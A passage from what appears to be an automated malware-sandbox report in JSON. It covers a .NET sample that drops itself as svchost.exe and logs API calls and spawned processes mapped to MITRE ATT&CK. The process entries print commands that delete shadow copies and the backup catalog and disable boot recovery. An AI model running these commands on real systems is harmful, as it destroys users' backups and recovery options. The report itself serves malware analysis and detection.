00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005968)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005968)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000244)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000244)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004144)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004144)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IEDllLoader (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSession (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CopyBindInfo (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateURLMoniker (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegisterBindStatusCallback (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ReleaseBindInfo (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RevokeBindStatusCallback (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter UrlMkGetSessionOption (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateUri (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetCombineUrl (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CoInternetGetSecurityUrl (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsValidURL (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InternetCrackUrlW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InternetCreateUrlW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00003480)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003480)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003944)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003184)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003184)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003720)\n \"wbadmin.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"svchost.exe\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00000244)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004144)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003480)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & b ...\" (UID: 00000000-00003944)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00001216)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00004368)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00003184)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003720)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"vssadmin.exe\" (UID: 00000000-00004144) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00003944) was launched with missing environment variables: \"PROMPT\"\n Process \"bcdedit.exe\" (UID: 00000000-00001216) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00003184) was launched with missing environment variables: \"PROMPT\"\n Process \"wbadmin.exe\" (UID: 00000000-00003720) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e002203136c@ADVAPI32.dll\"\n \"0d000e00fe02136c@ADVAPI32.dll\"\n \"0b000c00cc02136c@ADVAPI32.dll\"\n \"10001100da02136c@ADVAPI32.dll\"\n \"15001600c03e3969@ADVAPI32.dll\"\n \"0e000f00703f3969@ADVAPI32.dll\"\n \"0e000f00cc3f3969@ADVAPI32.dll\"\n \"11001200b4473969@ADVAPI32.dll\"\n \"1100120048483969@ADVAPI32.dll\"\n \"120013008c483969@ADVAPI32.dll\"\n \"12001300e4483969@ADVAPI32.dll\"\n \"14001500386e3969@ADVAPI32.dll\"\n \"14001500506e3969@ADVAPI32.dll\"\n \"14001500686e3969@ADVAPI32.dll\"\n \"17001800806e3969@ADVAPI32.dll\"\n \"0d000e00986e3969@ADVAPI32.dll\"\n \"11001200a86e3969@ADVAPI32.dll\"\n \"11001200bc6e3969@ADVAPI32.dll\"\n \"0f001000fc6f3969@ADVAPI32.dll\"\n \"140015003c703969@ADVAPI32.dll\"\n \"1400150054703969@ADVAPI32.dll\"\n \"0c000d009c703969@ADVAPI32.dll\"\n \"0c000d00ac703969@ADVAPI32.dll\"\n \"0e000f00bc703969@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" was detected as \".NET\" and name: \"Library\"\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"svchost.exe\" was detected as \".NET\" and name: \"Library\"\n \"svchost.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"svchost.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"svchost.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"svchost.exe\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005776)\n \"svchost.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005968)\n \"svchost.exe\" called \"CreateDirectoryW\" (UID: 00000000-00005968)\n \"wbadmin.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\Logs\\WindowsBackup (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"CreateProcessW\" with parameter \"\"%APPDATA%\\svchost.exe\"\" - (UID: 00000000-00005776)\n \"svchost.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" - (UID: 00000000-00005968)\n \"svchost.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenable\" - (UID: 00000000-00005968)\n \"svchost.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C wbadmin delete catalog -quiet\" - (UID: 00000000-00005968)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"wmic shadowcopy delete\" - (UID: 00000000-00000244)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"bcdedit /set {default} recoveryenabled no\" - (UID: 00000000-00003944)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"wbadmin delete catalog -quiet\" - (UID: 00000000-00003184)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\" has an executable section named \".text\"\n \"svchost.exe\" has an executable section named \".text\"", 